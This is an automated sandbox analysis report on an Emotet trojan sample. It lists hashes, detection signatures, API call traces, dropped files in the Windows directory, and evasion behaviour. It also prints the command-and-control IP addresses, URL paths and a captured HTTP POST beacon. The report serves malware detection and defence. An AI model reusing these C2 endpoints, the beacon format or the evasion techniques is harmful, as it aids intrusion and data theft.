Analysis Report 23cf697d5faf11a3ffdd271e1d301173

Overview

General Information

Sample Name: 23cf697d5faf11a3ffdd271e1d301173 (renamed file extension from none to exe)
Analysis ID: 318806
MD5: 3af8293a860045454a04904b46d80a28
SHA1: fe56d6a87a4b99e2c32d0ba772a37d8df8462d93
SHA256: eb02570af6496a540ae809d7f06259e5eefe03ede0cdf48d25425013ded368d6

Detection

Emotet
Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Emotet
Changes security center settings (notifications, updates, antivirus, firewall)
Drops executables to the windows directory (C:\Windows) and starts them
Hides that the sample has been downloaded from the Internet (zone.identifier)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files to the windows directory (C:\Windows)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_00402770 LoadLibraryA,LoadLibraryA,GetProcAddress,EncryptFileA,GetModuleHandleA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,LoadLibraryA,GetProcAddress,GetCurrentProcess,VirtualAllocExNuma,DialogBoxParamA, 0_2_00402770
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: 3_2_00402770 LoadLibraryA,LoadLibraryA,GetProcAddress,EncryptFileA,GetModuleHandleA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,LoadLibraryA,GetProcAddress,GetCurrentProcess,VirtualAllocExNuma,DialogBoxParamA, 3_2_00402770
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: 3_2_02172730 CryptAcquireContextW,CryptCreateHash,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptDecodeObjectEx,CryptGenKey, 3_2_02172730
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: 3_2_02172330 CryptGetHashParam,CryptExportKey,CryptDuplicateHash,GetProcessHeap,RtlAllocateHeap,CryptDestroyHash,CryptEncrypt,memcpy,GetProcessHeap,HeapFree, 3_2_02172330
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: 3_2_02172010 memcpy,CryptDestroyHash,CryptDuplicateHash,GetProcessHeap,RtlAllocateHeap,CryptDecrypt,CryptVerifySignatureW,GetProcessHeap,HeapFree, 3_2_02172010
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02633A10 _snwprintf,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindClose,FindClose, 0_2_02633A10
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: 3_2_02173A10 _snwprintf,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindClose,FindClose, 3_2_02173A10

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2404306 ET CNC Feodo Tracker Reported CnC Server TCP group 4 192.168.2.3:49709 -> 152.32.75.74:443
Source: Traffic Snort IDS: 2404346 ET CNC Feodo Tracker Reported CnC Server TCP group 24 192.168.2.3:49715 -> 91.121.200.35:8080
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.3:49715 -> 91.121.200.35:8080
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 152.32.75.74
Source: Joe Sandbox View IP Address: 91.121.200.35
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CONVERGE-ASConvergeICTSolutionsIncPH
Source: Joe Sandbox View ASN Name: OVHFR
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Source: global traffic TCP traffic: 192.168.2.3:49709 -> 152.32.75.74:443
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected:
  POST /b077Ye/stpEDZ6RpK8mZBC0Wc/DVjA3U6/ HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Encoding: gzip, deflate
  DNT: 1
  Connection: keep-alive
  Referer: 91.121.200.35/
  Upgrade-Insecure-Requests: 1
  Content-Type: multipart/form-data; boundary=----------D8UJrrwPxA
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 91.121.200.35:8080
  Content-Length: 4580
  Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 152.32.75.74
Source: unknown TCP traffic detected without corresponding DNS query: 91.121.200.35
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: 3_2_02172A80 InternetReadFile,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,HttpQueryInfoW, 3_2_02172A80
Source: unknown HTTP traffic detected:
  POST /b077Ye/stpEDZ6RpK8mZBC0Wc/DVjA3U6/ HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Encoding: gzip, deflate
  DNT: 1
  Connection: keep-alive
  Referer: 91.121.200.35/
  Upgrade-Insecure-Requests: 1
  Content-Type: multipart/form-data; boundary=----------D8UJrrwPxA
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 91.121.200.35:8080
  Content-Length: 4580
  Cache-Control: no-cache
Source: dot3hc.exe, 00000003.00000002.484904618.00000000022D4000.00000004.00000001.sdmp String found in binary or memory: http://152.32.75.74:443/e62xOOZ1/579L/jIWCf/
Source: dot3hc.exe, 00000003.00000002.484904618.00000000022D4000.00000004.00000001.sdmp String found in binary or memory: http://152.32.75.74:443/e62xOOZ1/579L/jIWCf/#
Source: dot3hc.exe, 00000003.00000002.485120144.00000000022F1000.00000004.00000001.sdmp String found in binary or memory: http://152.32.75.74:443/e62xOOZ1/579L/jIWCf/2n
Source: dot3hc.exe, 00000003.00000002.485120144.00000000022F1000.00000004.00000001.sdmp String found in binary or memory: http://152.32.75.74:443/e62xOOZ1/579L/jIWCf/ILE
Source: dot3hc.exe, 00000003.00000002.485120144.00000000022F1000.00000004.00000001.sdmp String found in binary or memory: http://152.32.75.74:443/e62xOOZ1/579L/jIWCf/ata
Source: dot3hc.exe, 00000003.00000002.485120144.00000000022F1000.00000004.00000001.sdmp String found in binary or memory: http://152.32.75.74:443/e62xOOZ1/579L/jIWCf/ste
Source: dot3hc.exe, 00000003.00000002.485120144.00000000022F1000.00000004.00000001.sdmp String found in binary or memory: http://91.121.200.35:8080/b077Ye/stpEDZ6RpK8mZBC0Wc/DVjA3U6/
Source: dot3hc.exe, 00000003.00000002.484989127.00000000022DD000.00000004.00000001.sdmp String found in binary or memory: http://91.121.200.35:8080/b077Ye/stpEDZ6RpK8mZBC0Wc/DVjA3U6/-
Source: dot3hc.exe, 00000003.00000002.485120144.00000000022F1000.00000004.00000001.sdmp String found in binary or memory: http://91.121.200.35:8080/b077Ye/stpEDZ6RpK8mZBC0Wc/DVjA3U6/5
Source: dot3hc.exe, 00000003.00000002.485120144.00000000022F1000.00000004.00000001.sdmp String found in binary or memory: http://91.121.200.35:8080/b077Ye/stpEDZ6RpK8mZBC0Wc/DVjA3U6/D
Source: dot3hc.exe, 00000003.00000002.485120144.00000000022F1000.00000004.00000001.sdmp String found in binary or memory: http://91.121.200.35:8080/b077Ye/stpEDZ6RpK8mZBC0Wc/DVjA3U6/s
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)
Source: dot3hc.exe, 00000003.00000002.483182974.000000000064A000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Emotet
Source: Yara match File source: 00000003.00000002.484278022.0000000002171000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.220853815.0000000002631000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.220137105.0000000002120000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.483728370.00000000020E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.220808157.00000000025E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.482905413.00000000005E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0.2.23cf697d5faf11a3ffdd271e1d301173.exe.2630000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.dot3hc.exe.2170000.1.unpack, type: UNPACKEDPE
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: 3_2_02172730 CryptAcquireContextW,CryptCreateHash,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptDecodeObjectEx,CryptGenKey, 3_2_02172730

System Summary:

Creates files inside the system directory
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe File created: C:\Windows\SysWOW64\cleanmgr\
Deletes files inside the Windows folder
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe File deleted: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe:Zone.Identifier
Detected potential crypto function
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_004098D7 0_2_004098D7
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_00408974 0_2_00408974
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02638180 0_2_02638180
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02631C70 0_2_02631C70
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02637590 0_2_02637590
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_0212380E 0_2_0212380E
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02129D1E 0_2_02129D1E
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_0212912E 0_2_0212912E
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: 3_2_004098D7 3_2_004098D7
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: 3_2_00408974 3_2_00408974
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: 3_2_02178180 3_2_02178180
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: 3_2_02171C70 3_2_02171C70
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: 3_2_02177590 3_2_02177590
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: String function: 00408928 appears 53 times
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: String function: 00408928 appears 53 times
Sample file is different than original file name gathered from version info
Source: 23cf697d5faf11a3ffdd271e1d301173.exe, 00000000.00000002.221221155.00000000029F0000.00000002.00000001.sdmp Binary or memory string: originalfilename vs 23cf697d5faf11a3ffdd271e1d301173.exe
Source: 23cf697d5faf11a3ffdd271e1d301173.exe, 00000000.00000002.221221155.00000000029F0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs 23cf697d5faf11a3ffdd271e1d301173.exe
Source: 23cf697d5faf11a3ffdd271e1d301173.exe, 00000000.00000002.221055432.00000000027E0000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs 23cf697d5faf11a3ffdd271e1d301173.exe
Tries to load missing DLLs
Source: C:\Windows\System32\svchost.exe Section loaded: xboxlivetitleid.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cdpsgshims.dll
Source: classification engine Classification label: mal68.troj.evad.winEXE@19/13@0/3
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle, 0_2_02638730
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: 3_2_02174CA0 Process32NextW,Process32NextW,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,FindCloseChangeNotification, 3_2_02174CA0
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02635060 QueryServiceConfig2W,CloseServiceHandle,ChangeServiceConfig2W,EnumServicesStatusExW,GetTickCount,OpenServiceW,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,RtlFreeHeap, 0_2_02635060
Source: C:\Windows\System32\svchost.exe File created: C:\Users\user\AppData\Local\Comms\UnistoreDB\tmp.edb
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:4660:120:WilError_01
Source: 23cf697d5faf11a3ffdd271e1d301173.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown Process created: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe 'C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe'
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s NgcSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s NgcCtnrSvc
Source: unknown Process created: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe C:\Windows\SysWOW64\cleanmgr\dot3hc.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Process created: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe C:\Windows\SysWOW64\cleanmgr\dot3hc.exe
Source: C:\Windows\System32\svchost.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Data Obfuscation:

Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_00402770 LoadLibraryA,LoadLibraryA,GetProcAddress,EncryptFileA,GetModuleHandleA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,LoadLibraryA,GetProcAddress,GetCurrentProcess,VirtualAllocExNuma,DialogBoxParamA, 0_2_00402770
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_00406030 push eax; ret 0_2_0040604E
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_00408963 push ecx; ret 0_2_00408973
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_0040AB90 push eax; ret 0_2_0040ABA4
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_0040AB90 push eax; ret 0_2_0040ABCC
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02635E70 push ecx; mov dword ptr [esp], 00008D73h 0_2_02635E71
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02635E40 push ecx; mov dword ptr [esp], 0000AEA2h 0_2_02635E41
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02635EA0 push ecx; mov dword ptr [esp], 00007473h 0_2_02635EA1
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02635F70 push ecx; mov dword ptr [esp], 000084ADh 0_2_02635F71
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02635F20 push ecx; mov dword ptr [esp], 0000E2ADh 0_2_02635F21
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02635FB0 push ecx; mov dword ptr [esp], 0000460Eh 0_2_02635FB1
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02635D70 push ecx; mov dword ptr [esp], 00008067h 0_2_02635D71
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02635D30 push ecx; mov dword ptr [esp], 00002C7Ch 0_2_02635D31
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02635D00 push ecx; mov dword ptr [esp], 000021B4h 0_2_02635D01
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02635DE0 push ecx; mov dword ptr [esp], 000025AAh 0_2_02635DE1
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02635DA0 push ecx; mov dword ptr [esp], 000036B8h 0_2_02635DA1
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02127A0E push ecx; mov dword ptr [esp], 00008D73h 0_2_02127A0F
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02127A3E push ecx; mov dword ptr [esp], 00007473h 0_2_02127A3F
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02127ABE push ecx; mov dword ptr [esp], 0000E2ADh 0_2_02127ABF
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02127B0E push ecx; mov dword ptr [esp], 000084ADh 0_2_02127B0F
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02127B4E push ecx; mov dword ptr [esp], 0000460Eh 0_2_02127B4F
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_0212789E push ecx; mov dword ptr [esp], 000021B4h 0_2_0212789F
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_021278CE push ecx; mov dword ptr [esp], 00002C7Ch 0_2_021278CF
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_0212790E push ecx; mov dword ptr [esp], 00008067h 0_2_0212790F
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_0212793E push ecx; mov dword ptr [esp], 000036B8h 0_2_0212793F
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_0212797E push ecx; mov dword ptr [esp], 000025AAh 0_2_0212797F
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_021279DE push ecx; mov dword ptr [esp], 0000AEA2h 0_2_021279DF
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: 3_2_00406030 push eax; ret 3_2_0040604E
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: 3_2_00408963 push ecx; ret 3_2_00408973
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: 3_2_0040AB90 push eax; ret 3_2_0040ABA4
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: 3_2_0040AB90 push eax; ret 3_2_0040ABCC
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: 3_2_02175E40 push ecx; mov dword ptr [esp], 0000AEA2h 3_2_02175E41

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Executable created and started: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe
Drops PE files to the windows directory (C:\Windows)
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe PE file moved: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe File opened: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe:Zone.Identifier read attributes | delete
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Contains functionality to enumerate running services
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: QueryServiceConfig2W,CloseServiceHandle,ChangeServiceConfig2W,EnumServicesStatusExW,GetTickCount,OpenServiceW,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,RtlFreeHeap, 0_2_02635060
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\svchost.exe TID: 6408 Thread sleep time: -30000s >= -30000s
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02633A10 _snwprintf,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindClose,FindClose, 0_2_02633A10
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: 3_2_02173A10 _snwprintf,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindClose,FindClose, 3_2_02173A10
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_0040D8AC VirtualQuery,GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualProtect, 0_2_0040D8AC
Source: svchost.exe, 00000005.00000002.236394856.000001FFC9140000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.292065099.0000028E9FF40000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.486558632.0000022005F40000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.308764171.0000029699140000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: svchost.exe, 00000007.00000002.488474706.0000027E35662000.00000004.00000001.sdmp Binary or memory string: @Hyper-V RAW
Source: svchost.exe, 00000006.00000002.481994541.000001F95C402000.00000004.00000001.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: dot3hc.exe, 00000003.00000002.484904618.00000000022D4000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.488445142.0000027E35655000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000005.00000002.236394856.000001FFC9140000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.292065099.0000028E9FF40000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.486558632.0000022005F40000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.308764171.0000029699140000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: svchost.exe, 00000005.00000002.236394856.000001FFC9140000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.292065099.0000028E9FF40000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.486558632.0000022005F40000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.308764171.0000029699140000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: svchost.exe, 00000007.00000002.483403302.0000027E2FE29000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW]f5~
Source: svchost.exe, 00000006.00000002.482120336.000001F95C429000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.482526087.0000022005268000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.482223226.000002088D829000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 00000005.00000002.236394856.000001FFC9140000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.292065099.0000028E9FF40000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.486558632.0000022005F40000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.308764171.0000029699140000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: svchost.exe, 00000005.00000002.236394856.000001FFC9140000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.292065099.0000028E9FF40000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.486558632.0000022005F40000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.308764171.0000029699140000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: svchost.exe, 00000007.00000002.488474706.0000027E35662000.00000004.00000001.sdmp Binary or memory string: @Hyper-V RAW
